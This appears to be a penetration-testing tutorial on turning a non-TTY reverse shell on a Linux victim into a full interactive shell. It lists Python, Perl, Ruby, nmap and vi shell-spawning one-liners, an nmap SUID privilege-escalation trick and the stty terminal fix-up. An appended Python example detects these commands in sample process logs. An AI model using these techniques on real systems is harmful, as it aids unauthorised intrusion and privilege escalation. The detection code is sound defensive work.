Shell spawning

Once you get a shell on a Linux victim machine, that shell may have no TTY (terminal connection), and to go on with the penetration test you will most likely need to spawn a TTY shell.

In fact, a shell without TTY functions does not allow you to perform important things such as the simple “su” command used to change user, or the “nano” editor used to create and modify files. Other functions needed in a penetration test also do not work in a shell without a TTY.

So there are some useful commands to turn such a shell into a TTY shell. They must be run from within the non-TTY shell.

Basic commands

The classic command is based on Python (obviously Python must be installed on the victim):

python -c 'import pty; pty.spawn("/bin/sh")'

or

python3 -c 'import pty; pty.spawn("/bin/sh")'

Other useful commands:

/bin/sh -i

From within an interactive Python interpreter (not from the shell prompt):
import os; os.system('/bin/bash')

From within a Perl interpreter:
exec "/bin/sh";

From the shell prompt using Perl:
perl -e 'exec "/bin/sh";'

From within a Ruby interpreter:
exec "/bin/sh"

From “nmap”:
nmap --interactive

and then

!sh

Sometimes, if “nmap” is a SUID executable with permission 4000 (meaning that whoever runs the file runs it with the same privileges as the owner), spawning a shell from “nmap” can also be useful for privilege escalation. This works only for nmap versions <= 5.21.

From within “vi” (“vi” is a text editor that works in a non-TTY shell):

:!bash

or, setting the shell first and then opening it:

:set shell=/bin/bash
:shell

Using STTY

The “stty” command allows you to change the characteristics of the terminal connection to the system. Running stty with the -a option, for example, prints the current configuration:

stty -a

To get a fully working TTY shell using “stty” the steps are the following:

In the victim machine reverse shell:
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

In the attacker console (the reverse shell is now backgrounded; note the rows and columns values printed by stty -a):
# echo $TERM
# stty -a
# stty raw -echo
# fg
[enter]
[enter]

Back in the reverse shell (use the rows and columns values from the attacker console):
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
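The commands above are also what a defender looks for in process-creation telemetry: an interpreter or scanner launched with a one-liner whose only purpose is to hand out a shell. The following is an added example, not code from the original page, that scans a few constructed process records (the `ts uid= comm= cmdline=` line shape is an assumption for the sample, not a real log format) for the TTY-spawning patterns listed in this article and returns the matching records with a technique label and severity.

```python
import re
from typing import Optional

# Constructed sample of process-creation records; these are not real logs.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z uid=33 comm=python cmdline=python -c 'import pty; pty.spawn("/bin/sh")'
2024-01-01T10:00:05Z uid=33 comm=sh cmdline=/bin/sh -i
2024-01-01T10:00:09Z uid=33 comm=perl cmdline=perl -e 'exec "/bin/sh";'
2024-01-01T10:00:12Z uid=0 comm=nmap cmdline=nmap --interactive
2024-01-01T10:01:00Z uid=1000 comm=python3 cmdline=python3 manage.py runserver
2024-01-01T10:01:30Z uid=1000 comm=nmap cmdline=nmap -sV 10.0.0.5
2024-01-01T10:02:00Z uid=33 comm=bash cmdline=bash -c 'export TERM=xterm-256color; stty rows 50 columns 200'
"""

# Assumed record layout for the constructed sample above.
RECORD_RE = re.compile(r"^(\S+) uid=(\d+) comm=(\S+) cmdline=(.*)$")

# (technique name, severity, regex over the command line). Order matters:
# the first matching rule wins, so the strong shell-spawn indicators come first
# and the weaker "terminal fix-up" indicator (stty rows / export TERM) last.
SPAWN_RULES = [
    ("python pty.spawn", "high", re.compile(r"\bpython[0-9.]*\b.*\bpty\.spawn\(")),
    ("perl exec shell", "high", re.compile(r"\bperl\b.*\bexec\s+[\"']?/bin/(?:ba)?sh")),
    ("ruby exec shell", "high", re.compile(r"\bruby\b.*\bexec\s+[\"']?/bin/(?:ba)?sh")),
    ("nmap interactive mode", "high", re.compile(r"\bnmap\b.*--interactive\b")),
    ("interactive shell flag", "medium", re.compile(r"(?:^|/)(?:ba)?sh\s+-i\b")),
    ("terminal fix-up (stty/TERM)", "low", re.compile(r"\bstty\s+rows\b|\bexport\s+TERM=")),
]


def classify(cmdline: str) -> Optional[str]:
    """Return the technique name of the first rule matching the command line, or None."""
    for name, _severity, pattern in SPAWN_RULES:
        if pattern.search(cmdline):
            return name
    return None


def severity_of(technique: str) -> str:
    """Look up the severity assigned to a technique name."""
    for name, severity, _pattern in SPAWN_RULES:
        if name == technique:
            return severity
    raise KeyError(technique)


def parse_record(line: str) -> Optional[dict]:
    """Parse one record of the assumed sample layout; None for lines that don't fit."""
    match = RECORD_RE.match(line)
    if match is None:
        return None
    ts, uid, comm, cmdline = match.groups()
    return {"ts": ts, "uid": int(uid), "comm": comm, "cmdline": cmdline}


def scan(log_text: str) -> list:
    """Return the records whose command line matches a TTY-spawning pattern.

    A web/service account (here uid 33) spawning a pty is the classic post-exploitation
    signal; the same command typed by an administrator in a real terminal is far less
    suspicious, so a real detection would also join the parent process and session type.
    """
    hits = []
    for line in log_text.splitlines():
        record = parse_record(line)
        if record is None:
            continue
        technique = classify(record["cmdline"])
        if technique is None:
            continue
        record["technique"] = technique
        record["severity"] = severity_of(technique)
        hits.append(record)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} uid={hit["uid"]} [{hit["severity"]}] {hit["technique"]}: {hit["cmdline"]}')
```

The rules deliberately key on the shape of the one-liner (interpreter plus `pty.spawn(` or `exec "/bin/sh"`) rather than on the interpreter name alone, so ordinary `python3 manage.py` or `nmap -sV` invocations in the sample are not flagged; the `stty rows` / `export TERM=` fix-up from the last step of the article is kept as a low-severity corroborating signal.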